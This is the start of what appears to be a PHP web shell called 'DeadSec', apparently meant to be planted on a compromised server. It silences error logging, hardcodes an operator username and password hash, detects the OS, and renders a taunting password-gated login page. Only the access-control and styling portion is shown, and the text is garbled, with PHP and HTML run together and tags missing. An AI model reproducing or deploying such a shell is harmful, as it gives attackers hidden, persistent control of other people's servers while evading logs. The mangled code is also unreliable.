@ini_set("error_log", NULL);@ini_set("log_errors", 0);@error_reporting(0);@error_log(false);@session_start();define("username", "DarXsec");define("passwd", "96be84a5ba486caf7e767bc6e2d97d7d");if (strtolower(substr(PHP_OS, 0, 3)) === "win") { $os = "Windows";} else { $os = "Linux";}function sanitize($str){ return filter_var(htmlspecialchars($str), FILTER_SANITIZE_FULL_SPECIAL_CHARS);}function login_shell(){<!DOCTYPE html><html lang="en">
<meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0">LOGIN DeadSec <title>LOGIN DeadSec</title> <link href="https://fonts.googleapis.com/css2?family=Creepster&family=Caveat+Brush&display=swap" rel="stylesheet"> <link rel="shortcut icon" href="https://wallpapercave.com/wp/wp4020127.jpg" type="image/x-icon"><style> :root { --text-color: #fff; --text-red: rgb(255, 0, 0); --box-color: #202e62; --unactive: rgb(98, 98, 98); } * { margin: 0; padding: 0; } html { height: 100vh; width: 100%; } body { overflow: hidden; background-image: url(https://pomf2.lain.la/f/1jhntt0.jpg); background-color: black; background-size: cover; background-repeat: no-repeat; align-items: center; } .login-form { height: 100vh; width: 100%; position: inherit; box-sizing: border-box; display: flex; justify-content: center; align-items: center; flex-direction: column; } .logo { font-family: 'Creepster', cursive; color: var(--text-color); font-size: 50px; } .logo span { color: var(--text-red); } .login-box { width: 300px; background-color: var(--box-color); padding: 40px; margin-top: 10px; border-radius: 15px; box-shadow: 0px 3px 3px 0px rgba(0, 0, 0, 0.12), 0px 3px 6px 0px rgba(0, 0, 0, 0.22), 0px 5px 10px 0px rgba(0, 0, 0, 0.2), 0px 8px 12px 1px rgba(0, 0, 0, 0.19); display: flex; flex-direction: column; justify-content: center; align-items: center; } .login-box input { margin-top: 20px; border-radius: 5px; padding: 10px; border: 1px solid var(--unactive); background-color: var(--box-color); outline: none; color: var(--text-color); } .login-box .inputBox { position: relative; width: 100%; display: flex; flex-direction: column; } .inputBox span { color: var(--unactive); top: 20px; position: absolute; padding: 10px; pointer-events: none; transition: 300ms; } .login-box input:valid~span, .login-box input:focus~span { color: var(--text-color); transform: translateX(10px) translateY(-7px); font-size: 0.8em; padding: 0 10px; background: var(--box-color); } .submit { display: flex; justify-content: center; } .error { color: var(--text-red); } .quote { color: var(--text-color); font-family: 'Caveat Brush'; font-size: 25px; } .copyright { display: flex; justify-content: center; margin: 10px; font-family: 'caveat Brush'; color: var(--text-color); font-size: 20px; } .hidden { visibility: hidden; } @media only screen and (max-width: 480px) { body { background-image: url(https://wallpapercave.com/wp/wp4020127.jpg); } .login-box { width: calc(100vw - 100px); } .quote { font-size: 20px; } }</style> <div class="login-form"> <h1 class="logo">LOGIN<span> DeadSec</span> <div class="login-box"> <p class="quote">haha login first little bastard</p> </div> <div class="copyright"><span>© DeadSec 2023</span></div> </div>